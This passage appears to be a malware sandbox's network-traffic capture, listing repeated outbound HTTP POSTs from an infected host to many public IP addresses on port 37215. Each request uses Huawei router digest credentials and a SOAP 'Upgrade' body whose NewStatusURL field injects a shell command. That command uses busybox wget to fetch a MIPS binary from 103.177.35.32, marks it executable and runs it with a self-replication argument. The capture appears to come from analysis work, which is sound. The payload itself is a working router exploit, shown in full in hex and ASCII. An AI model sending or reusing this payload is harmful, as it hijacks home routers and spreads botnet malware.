                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2633192.168.2.2335766218.100.146.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628983974 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2634192.168.2.2342586157.130.42.18837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629071951 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2635192.168.2.2356620153.225.1.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629089117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2636192.168.2.235454041.175.206.17937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629095078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2637192.168.2.2348614197.212.242.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629152060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2638192.168.2.2344524137.160.241.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629163980 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2639192.168.2.235792658.127.137.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629163980 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2640192.168.2.235694041.34.97.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629170895 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2641192.168.2.2355416197.105.99.23037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629173040 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2642192.168.2.2342638197.174.192.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.629184008 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
